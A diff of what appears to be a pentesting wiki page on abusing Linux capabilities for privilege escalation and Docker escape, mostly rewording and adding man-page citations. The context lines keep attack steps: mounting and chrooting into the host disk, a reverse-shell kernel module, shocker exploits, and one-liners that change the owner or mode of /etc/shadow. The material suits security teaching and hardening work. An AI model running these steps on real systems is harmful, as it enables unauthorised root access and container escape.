+**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is a highly potent Linux capability, often equated to a near-root level due to its extensive **administrative privileges**, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, **`CAP_SYS_ADMIN` poses significant security challenges**, especially in containerized environments, due to its potential for privilege escalation and system compromise. Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the **principle of least privilege** and minimize the attack surface.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -442,11 +420,11 @@ gid=0(root)
 groups=0(root)
 ```
 
-Inside the previous output you can see that the SYS_ADMIN capability is enabled.
+Inside the previous output you can see that the SYS_ADMIN capability is enabled.<sup>[[14]](#references)</sup>
 
 - **Mount**
 
-This allows the docker container to **mount the host disk and access it freely**:
+With suitable device and namespace access, this can allow a Docker container to **mount a host disk and access its contents**.<sup>[[14]](#references)</sup>
 
 ```bash
 fdisk -l #Get disk name
@@ -462,8 +440,8 @@ chroot ./ bash #You have a shell inside the docker hosts disk
 
 - **Full access**
 
-In the previous method we managed to access the docker host disk.\
-In case you find that the host is running an **ssh** server, you could **create a user inside the docker host** disk and access it via SSH:
+In the previous method we managed to access a host disk.\
+If the host is running an **ssh** server, you could **create a user inside the mounted disk** and access it via SSH.<sup>[[14]](#references)</sup>
 
 ```bash
 #Like in the example before, the first step is to mount the docker host disk
@@ -481,7 +459,7 @@ ssh john@172.17.0.1 -p 2222
 
 ## CAP_SYS_PTRACE
 
-**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**.
+With `CAP_SYS_PTRACE`, a process can trace and inspect other processes that are visible in its PID namespace. To target host processes from a Docker container, share the host PID namespace with `--pid=host` (or join a namespace containing the target).<sup>[[14]](#references)[[20]](#references)</sup>
 
 **[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** grants the ability to use debugging and system call tracing functionalities provided by `ptrace(2)` and cross-memory attach calls like `process_vm_readv(2)` and `process_vm_writev(2)`. Although powerful for diagnostic and monitoring purposes, if `CAP_SYS_PTRACE` is enabled without restrictive measures like a seccomp filter on `ptrace(2)`, it can significantly undermine system security. Specifically, it can be exploited to circumvent other security restrictions, notably those imposed by seccomp, as demonstrated by [proofs of concept (PoC) like this one](https://gist.github.com/thejh/8346f47e359adecd1d53).<sup>[[10]](#references)</sup>
 
@@ -681,8 +659,8 @@ List **processes** running in the **host** `ps -eaf`
 
 ## CAP_SYS_MODULE
 
-**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** empowers a process to **load and unload kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls)**, offering direct access to the kernel's core operations. This capability presents critical security risks, as it enables privilege escalation and total system compromise by allowing modifications to the kernel, thereby bypassing all Linux security mechanisms, including Linux Security Modules and container isolation.<sup>[[6]](#references)</sup>
-**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.**
+**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** empowers a process to **load and unload kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls)**, offering direct access to the kernel's core operations. This capability presents critical security risks because loading a module can modify kernel behavior and may defeat isolation boundaries.<sup>[[6]](#references)[[14]](#references)</sup>
+**This allows inserting or removing modules in the kernel visible to the process; in a container, whether that is the host kernel depends on the isolation configuration**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -744,7 +722,7 @@ gid=0(root)
 groups=0(root)
 ```
 
-Inside the previous output you can see that the **SYS_MODULE** capability is enabled.
+Inside the previous output you can see that the **SYS_MODULE** capability is enabled.<sup>[[14]](#references)</sup>
 
 **Create** the **kernel module** that is going to execute a reverse shell and the **Makefile** to **compile** it:
 
@@ -804,18 +782,18 @@ nc -lvnp 4444
 insmod reverse-shell.ko #Launch the reverse shell
 ```
 
-**The code of this technique was copied from the laboratory of "Abusing SYS_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)<sup>[[1]](#references)</sup>
+**The code of this technique was copied from the laboratory of "Abusing SYS_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com).<sup>[[1]](#references)</sup>
 
 Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
 
 ## CAP_DAC_READ_SEARCH
 
 [**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables a process to **bypass permissions for reading files and for reading and executing directories**. Its primary use is for file searching or reading purposes. However, it also allows a process to use the `open_by_handle_at(2)` function, which can access any file, including those outside the process's mount namespace. The handle used in `open_by_handle_at(2)` is supposed to be a non-transparent identifier obtained through `name_to_handle_at(2)`, but it can include sensitive information like inode numbers that are vulnerable to tampering. The potential for exploitation of this capability, particularly in the context of Docker containers, was demonstrated by Sebastian Krahmer with the shocker exploit, as analyzed [here](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3).<sup>[[12]](#references)[[13]](#references)</sup>
-**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.**
+**This means that you can bypass file read permission checks and directory read/execute permission checks**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
-The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file:
+The binary can read files that are accessible in its namespaces. So, if a file like `tar` has this capability, it can read the shadow file:
 
 ```bash
 cd /etc
@@ -843,7 +821,7 @@ print(open("/etc/shadow", "r").read())
 
 **Example in Environment (Docker breakout)**
 
-You can check the enabled capabilities inside the docker container using:
+You can check the enabled capabilities inside the Docker container using `capsh --print`.<sup>[[14]](#references)[[26]](#references)</sup>
 
 ```
 capsh --print
@@ -858,11 +836,11 @@ gid=0(root)
 groups=0(root)
 ```
 
-Inside the previous output you can see that the **DAC_READ_SEARCH** capability is enabled. As a result, the container can **debug processes**.
+Inside the previous output you can see that the **DAC_READ_SEARCH** capability is enabled. This bypasses DAC read/search checks and permits `open_by_handle_at(2)`; it is not a process-debugging capability by itself.<sup>[[14]](#references)</sup>
 
-You can learn how the following exploiting works in [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) but in resume **CAP_DAC_READ_SEARCH** not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to _**open_by_handle_at(2)**_ and **could allow our process to sensitive files opened by other processes**.<sup>[[13]](#references)</sup>
+You can learn how the following exploit works in [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3), but in brief, **CAP_DAC_READ_SEARCH** allows traversing the file system without permission checks and permits `open_by_handle_at(2)`; this can expose files opened by other processes when the relevant namespaces and mounts are reachable.<sup>[[13]](#references)[[14]](#references)</sup>
 
-The original exploit that abuse this permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), the following is a **modified version that allows you to indicate the file you want to read as first argument and dump it in a file.**<sup>[[12]](#references)</sup>
+The original exploit that abuses these permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c); the following is a **modified version that lets you pass the file to read as the first argument and dump the result to a file**.<sup>[[12]](#references)</sup>
 
 ```c
 #include <stdio.h>
@@ -1019,14 +997,14 @@ int main(int argc,char* argv[] )
 
 ![CAP SYS MODULE - CAP DAC READ SEARCH: The exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses...](<../../images/image (407) (1).png>)
 
-**The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)<sup>[[1]](#references)</sup>
+**The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com).<sup>[[1]](#references)</sup>
 
 
 ## CAP_DAC_OVERRIDE
 
-**This mean that you can bypass write permission checks on any file, so you can write any file.**
+**This capability bypasses file read, write, and execute permission checks**.<sup>[[14]](#references)</sup>
 
-There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](../processes-crontab-systemd-dbus/payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
+Look for files that become readable or writable through membership in a privileged group; the useful targets depend on the target's ownership and mode bits.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1051,20 +1029,7 @@ file.close()
 
 **Example with environment + CAP_DAC_READ_SEARCH (Docker breakout)**
 
-You can check the enabled capabilities inside the docker container using:
-
-```bash
-capsh --print
-Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
-Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
-Securebits: 00/0x0/1'b0
- secure-noroot: no (unlocked)
- secure-no-suid-fixup: no (unlocked)
- secure-keep-caps: no (unlocked)
-uid=0(root)
-gid=0(root)
-groups=0(root)
-```
+Confirm `CAP_DAC_OVERRIDE` with `capsh --print` as shown in the preceding `CAP_DAC_READ_SEARCH` environment example.<sup>[[14]](#references)[[26]](#references)</sup>
 
 First of all read the previous section that [**abuses DAC_READ_SEARCH capability to read arbitrary files**](linux-capabilities.md#cap_dac_read_search) of the host and **compile** the exploit.\
 Then, **compile the following version of the shocker exploit** that will allow you to **write arbitrary files** inside the hosts filesystem:
@@ -1210,15 +1175,15 @@ int main(int argc, char * argv[]) {
 
 In order to scape the docker container you could **download** the files `/etc/shadow` and `/etc/passwd` from the host, **add** to them a **new user**, and use **`shocker_write`** to overwrite them. Then, **access** via **ssh**.
 
-**The code of this technique was copied from the laboratory of "Abusing DAC_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)<sup>[[1]](#references)</sup>
+**The code of this technique was copied from the laboratory of "Abusing DAC_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com).<sup>[[1]](#references)</sup>
 
 ## CAP_CHOWN
 
-**This means that it's possible to change the ownership of any file.**
+**This capability allows a process to change the ownership of files**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
-Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges:
+Lets suppose the **`python`** binary has this capability; you can change the owner of a file such as **`shadow`**, then use the resulting access to modify it if other permissions allow:
 
 ```bash
 python -c 'import os;os.chown("/etc/shadow",1000,1000)'
@@ -1232,19 +1197,19 @@ ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
 
 ## CAP_FOWNER
 
-**This means that it's possible to change the permission of any file.**
+**This capability bypasses ownership checks for many file operations, including changing permissions**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
 If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges:
 
 ```bash
-python -c 'import os;os.chmod("/etc/shadow",0666)
+python -c 'import os; os.chmod("/etc/shadow", 0o666)'
 ```
 
 ### CAP_SETUID
 
-**This means that it's possible to set the effective user id of the created process.**
+**This capability allows a process to change its effective user ID, subject to the credential and capability rules enforced by the kernel**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1269,7 +1234,7 @@ os.system("/bin/bash")
 
 ## CAP_SETGID
 
-**This means that it's possible to set the effective group id of the created process.**
+**This capability allows a process to change its effective group ID, subject to the credential and capability rules enforced by the kernel**.<sup>[[14]](#references)</sup>
 
 There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](../processes-crontab-systemd-dbus/payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
 
@@ -1326,7 +1291,7 @@ If **docker** is installed you could **impersonate** the **docker group** and ab
 
 ## CAP_SETFCAP
 
-**This means that it's possible to set capabilities on files and processes**
+**This capability allows a process to set file capabilities**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1360,13 +1325,14 @@ python setcapability.py /usr/bin/python2.7
 ```
 
 > [!WARNING]
-> Note that if you set a new capability to the binary with CAP_SETFCAP, you will lose this cap.
+> A newly written file capability set replaces the previous set; if the helper is then executed with only the new capabilities, it may no longer retain `CAP_SETFCAP` to update another file.<sup>[[14]](#references)[[25]](#references)</sup>
 
 Once you have [SETUID capability](linux-capabilities.md#cap_setuid) you can go to its section to see how to escalate privileges.
 
 **Example with environment (Docker breakout)**
 
-By default the capability **CAP_SETFCAP is given to the proccess inside the container in Docker**. You can check that doing something like:
+Docker's documented default capability set includes **CAP_SETFCAP**, but the actual set depends on the runtime configuration.<sup>[[19]](#references)</sup>
+You can inspect the process capabilities with:
 
 ```bash
 cat /proc/`pidof bash`/status | grep Cap
@@ -1380,8 +1346,7 @@ capsh --decode=00000000a80425fb
 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
 ```
 
-This capability allow to **give any other capability to binaries**, so we could think about **escaping** from the container **abusing any of the other capability breakouts** mentioned in this page.\
-However, if you try to give for example the capabilities CAP_SYS_ADMIN and CAP_SYS_PTRACE to the gdb binary, you will find that you can give them, but the **binary won’t be able to execute after this**:
+This capability allows writing file capabilities, but it does not by itself grant those capabilities to the current process or bypass the file, bounding-set, and namespace rules applied when the file is executed.<sup>[[14]](#references)</sup>
 
 ```bash
 getcap /usr/bin/gdb
@@ -1393,21 +1358,17 @@ setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb
 bash: /usr/bin/gdb: Operation not permitted
 ```
 
-[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: This is a **limiting superset for the effective capabilities** that the thread may assume. It is also a limiting superset for the capabilities that may be added to the inheri‐table set by a thread that **does not have the CAP_SETPCAP** capability in its effective set._\
-It looks like the Permitted capabilities limit the ones that can be used.\
-However, Docker also grants the **CAP_SETPCAP** by default, so you might be able to **set new capabilities inside the inheritables ones**.\
-However, in the documentation of this cap: _CAP_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\
-It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP_SYS_ADMIN or CAP_SYS_PTRACE in the inherit set to escalate privileges**.
+The file's permitted capabilities are limited by the process's capability bounding set, and the file effective bit controls whether the file's permitted set is raised into the process's effective set. This is why adding capabilities to a file does not automatically make every requested capability usable at execution time.<sup>[[14]](#references)</sup>
 
 ## CAP_SYS_RAWIO
 
-[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`.
+[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to perform a range of device-specific operations on other devices.<sup>[[14]](#references)</sup>
 
-This can be useful for **privilege escalation** and **Docker breakout.**
+This can be useful for **privilege escalation** and **Docker breakout**.<sup>[[14]](#references)</sup>
 
 ## CAP_KILL
 
-**This means that it's possible to kill any process.**
+**This capability bypasses permission checks for sending signals to processes in the cases defined by the kernel**.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1438,7 +1399,7 @@ kill -s SIGUSR1 <nodejs-ps>
 
 ## CAP_NET_BIND_SERVICE
 
-**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability.
+**This capability permits binding to Internet ports below 1024.** It does not directly grant broader privilege escalation.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1474,9 +1435,9 @@ s.connect(('10.10.10.10',500))
 
 ## CAP_NET_RAW
 
-[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) capability permits processes to **create RAW and PACKET sockets**, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, **CAP_NET_RAW** is crucial for privileged containers to support operations like ping via RAW ICMP requests.
+[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits processes to **create RAW and PACKET sockets**, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, **CAP_NET_RAW** supports operations like ping via RAW ICMP requests.<sup>[[14]](#references)</sup>
 
-**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability.
+**This can enable packet capture with a suitable socket interface.** It does not directly grant broader privilege escalation.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1487,11 +1448,11 @@ getcap -r / 2>/dev/null
 /usr/sbin/tcpdump = cap_net_raw+ep
 ```
 
-Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic.
+If the **environment** grants this capability, **`tcpdump`** can also use it to sniff traffic.<sup>[[14]](#references)</sup>
 
 **Example with binary 2**
 
-The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET_BIND + NET_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com)<sup>[[1]](#references)</sup>
+The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET_BIND + NET_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com).<sup>[[1]](#references)</sup>
 
 ```python
 import socket
@@ -1539,7 +1500,7 @@ while True:
 
 ## CAP_NET_ADMIN + CAP_NET_RAW
 
-[**CAP_NET_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) capability grants the holder the power to **alter network configurations**, including firewall settings, routing tables, socket permissions, and network interface settings within the exposed network namespaces. It also enables turning on **promiscuous mode** on network interfaces, allowing for packet sniffing across namespaces.
+[**CAP_NET_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) grants the holder the power to **alter network configurations**, including firewall settings, routing tables, socket permissions, and network interface settings within the exposed network namespaces. It also enables turning on **promiscuous mode** on network interfaces, allowing for packet sniffing across namespaces.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1559,7 +1520,7 @@ iptc.easy.flush_table('filter')
 
 ## CAP_LINUX_IMMUTABLE
 
-**This means that it's possible modify inode attributes.** You cannot escalate privileges directly with this capability.
+**This capability permits modifying inode flags such as immutable and append-only.** It does not directly grant broader privilege escalation.<sup>[[14]](#references)</sup>
 
 **Example with binary**
 
@@ -1572,21 +1533,25 @@ lsattr file.sh
 ```
 
 ```python
-#Pyhton code to allow modifications to the file
+# Python code to remove the immutable flag and allow modifications
 import fcntl
 import os
 import struct
 
-FS_APPEND_FL = 0x00000020
+FS_IMMUTABLE_FL = 0x00000010
+FS_IOC_GETFLAGS = 0x80086601
 FS_IOC_SETFLAGS = 0x40086602
 
 fd = os.open('/path/to/file.sh', os.O_RDONLY)
-f = struct.pack('i', FS_APPEND_FL)
-fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)
+flags = struct.unpack('i', fcntl.ioctl(fd, FS_IOC_GETFLAGS, struct.pack('i', 0)))[0]
+fcntl.ioctl(fd, FS_IOC_SETFLAGS, struct.pack('i', flags & ~FS_IMMUTABLE_FL))
+os.close(fd)
 
-f=open("/path/to/file.sh",'a+')
-f.write('New content for the file\n')
+with open('/path/to/file.sh', 'a') as f:
+    f.write('New content for the file\n')
 ```
+
+The `FS_IOC_GETFLAGS` and `FS_IOC_SETFLAGS` operations read and update inode flags; `FS_IMMUTABLE_FL` is the immutable flag cleared by this example.<sup>[[27]](#references)</sup>
 
 > [!TIP]
 > Note that usually this immutable attribute is set and remove using:
@@ -1598,31 +1563,31 @@ f.write('New content for the file\n')
 
 ## CAP_SYS_CHROOT
 
-[**CAP_SYS_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables the execution of the `chroot(2)` system call, which can potentially allow for the escape from `chroot(2)` environments through known vulnerabilities:<sup>[[11]](#references)</sup>
+[**CAP_SYS_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables the execution of the `chroot(2)` system call, which can potentially allow for the escape from `chroot(2)` environments through known vulnerabilities.<sup>[[11]](#references)[[14]](#references)</sup>
 
-- [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf)<sup>[[11]](#references)</sup>
+- [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf).<sup>[[11]](#references)</sup>
 - [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
 
 ## CAP_SYS_BOOT
 
-[**CAP_SYS_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) not only allows the execution of the `reboot(2)` system call for system restarts, including specific commands like `LINUX_REBOOT_CMD_RESTART2` tailored for certain hardware platforms, but it also enables the use of `kexec_load(2)` and, from Linux 3.17 onwards, `kexec_file_load(2)` for loading new or signed crash kernels respectively.
+[**CAP_SYS_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the execution of the `reboot(2)` system call for system restarts, including commands such as `LINUX_REBOOT_CMD_RESTART2`; it also enables `kexec_load(2)` and, from Linux 3.17 onwards, `kexec_file_load(2)` for loading new or signed crash kernels respectively.<sup>[[14]](#references)</sup>
 
 ## CAP_SYSLOG
 
-[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) was separated from the broader **CAP_SYS_ADMIN** in Linux 2.6.37, specifically granting the ability to use the `syslog(2)` call. This capability enables the viewing of kernel addresses via `/proc` and similar interfaces when the `kptr_restrict` setting is at 1, which controls the exposure of kernel addresses. Since Linux 2.6.39, the default for `kptr_restrict` is 0, meaning kernel addresses are exposed, though many distributions set this to 1 (hide addresses except from uid 0) or 2 (always hide addresses) for security reasons.
+[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) was separated from the broader **CAP_SYS_ADMIN** in Linux 2.6.37, specifically granting the ability to use the `syslog(2)` call. This capability enables the viewing of kernel addresses via `/proc` and similar interfaces when the `kptr_restrict` setting is at 1, which controls the exposure of kernel addresses. Since Linux 2.6.39, the default for `kptr_restrict` is 0, meaning kernel addresses are exposed, though many distributions set this to 1 (hide addresses except from uid 0) or 2 (always hide addresses) for security reasons.<sup>[[14]](#references)</sup>
 
-Additionally, **CAP_SYSLOG** allows accessing `dmesg` output when `dmesg_restrict` is set to 1. Despite these changes, **CAP_SYS_ADMIN** retains the ability to perform `syslog` operations due to historical precedents.
+Additionally, **CAP_SYSLOG** allows accessing `dmesg` output when `dmesg_restrict` is set to 1. Despite these changes, **CAP_SYS_ADMIN** retains the ability to perform `syslog` operations due to historical precedents.<sup>[[14]](#references)</sup>
 
 ## CAP_MKNOD
 
-[**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) extends the functionality of the `mknod` system call beyond creating regular files, FIFOs (named pipes), or UNIX domain sockets. It specifically allows for the creation of special files, which include:
+[**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) extends the functionality of the `mknod` system call beyond creating regular files, FIFOs (named pipes), or UNIX domain sockets. It specifically allows for the creation of special files, which include:<sup>[[14]](#references)</sup>
 
 - **S_IFCHR**: Character special files, which are devices like terminals.
 - **S_IFBLK**: Block special files, which are devices like disks.
 
-This capability is essential for processes that require the ability to create device files, facilitating direct hardware interaction through character or block devices.
+This capability is useful for processes that need to create device files, including character or block devices.<sup>[[14]](#references)</sup>
 
-It is a default docker capability ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)).
+It is included in Docker's documented default capability set; verify the actual runtime configuration rather than assuming every deployment uses the same defaults ([Moby default capability list](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)).<sup>[[19]](#references)</sup>
 
 This capability permits to do privilege escalations (through full disk read) on the host, under these conditions:<sup>[[7]](#references)</sup>
 
@@ -1661,21 +1626,13 @@ ps aux | grep -i container_name | grep -i standarduser
 head /proc/12345/root/dev/sdb
 ```
 
-This approach allows the standard user to access and potentially read data from `/dev/sdb` through the container, exploiting shared user namespaces and permissions set on the device.
+This approach allows the standard user to access and potentially read data from `/dev/sdb` through the container when the device, namespaces, and permissions are configured as described.<sup>[[7]](#references)</sup>
 
 ### CAP_SETPCAP
 
-**CAP_SETPCAP** enables a process to **alter the capability sets** of another process, allowing for the addition or removal of capabilities from the effective, inheritable, and permitted sets. However, a process can only modify capabilities that it possesses in its own permitted set, ensuring it cannot elevate another process's privileges beyond its own. Recent kernel updates have tightened these rules, restricting `CAP_SETPCAP` to only diminish the capabilities within its own or its descendants' permitted sets, aiming to mitigate security risks. Usage requires having `CAP_SETPCAP` in the effective set and the target capabilities in the permitted set, utilizing `capset()` for modifications. This summarizes the core function and limitations of `CAP_SETPCAP`, highlighting its role in privilege management and security enhancement.
+On current Linux kernels with file capabilities, **`CAP_SETPCAP`** lets a thread add capabilities from its bounding set to its inheritable set, drop capabilities from its bounding set, and change its securebits. It does not let a process arbitrarily grant capabilities to another process; that behavior applies only to pre-2.6.25 kernels without file-capability support.<sup>[[14]](#references)</sup>
 
-**`CAP_SETPCAP`** is a Linux capability that allows a process to **modify the capability sets of another process**. It grants the ability to add or remove capabilities from the effective, inheritable, and permitted capability sets of other processes. However, there are certain restrictions on how this capability can be used.
-
-A process with `CAP_SETPCAP` **can only grant or remove capabilities that are in its own permitted capability set**. In other words, a process cannot grant a capability to another process if it does not have that capability itself. This restriction prevents a process from elevating the privileges of another process beyond its own level of privilege.
-
-Moreover, in recent kernel versions, the `CAP_SETPCAP` capability has been **further restricted**. It no longer allows a process to arbitrarily modify the capability sets of other processes. Instead, it **only allows a process to lower the capabilities in its own permitted capability set or the permitted capability set of its descendants**. This change was introduced to reduce potential security risks associated with the capability.
-
-To use `CAP_SETPCAP` effectively, you need to have the capability in your effective capability set and the target capabilities in your permitted capability set. You can then use the `capset()` system call to modify the capability sets of other processes.
-
-In summary, `CAP_SETPCAP` allows a process to modify the capability sets of other processes, but it cannot grant capabilities that it doesn't have itself. Additionally, due to security concerns, its functionality has been limited in recent kernel versions to only allow reducing capabilities in its own permitted capability set or the permitted capability sets of its descendants.
+The `capset()` system call can adjust a thread's own effective, permitted, and inheritable sets, but the new permitted set cannot contain capabilities outside the existing permitted set and inheritable updates remain subject to kernel constraints.<sup>[[14]](#references)</sup>
 
 ## References
 
@@ -1685,13 +1642,26 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe
 - [4] [Linux capabilities 101](https://linux-audit.com/linux-capabilities-101/)
 - [5] [Taking Advantage of Linux Capabilities](https://www.linuxjournal.com/article/5737)
 - [6] [Excessive Capabilities](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module)
-- [7] [WithSecure Labs: Abusing the access to mount namespaces through /proc/pid/root](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)
+- [7] [Abusing access to mount namespaces through /proc/pid/root](https://labs.reversec.com/posts/2020/06/abusing-access-to-mount-namespaces-through-procpidroot)
 - [8] [Linux Capabilities: Why They Exist and How They Work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
 - [9] [Understanding Capabilities in Linux](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
 - [10] [PoC for bypassing seccomp if ptrace is allowed](https://gist.github.com/thejh/8346f47e359adecd1d53)
 - [11] [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf)
 - [12] [shocker.c - original CAP_DAC_READ_SEARCH Docker breakout exploit by Sebastian Krahmer](http://stealth.openwall.net/xSports/shocker.c)
 - [13] [Docker breakout exploit analysis](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)
+- [14] [capabilities(7) - Linux manual page](https://man7.org/linux/man-pages/man7/capabilities.7.html)
+- [15] [proc_pid_status(5) - Linux manual page](https://man7.org/linux/man-pages/man5/proc_pid_status.5.html)
+- [16] [pam_cap(8) - Linux manual page](https://man7.org/linux/man-pages/man8/pam_cap.8.html)
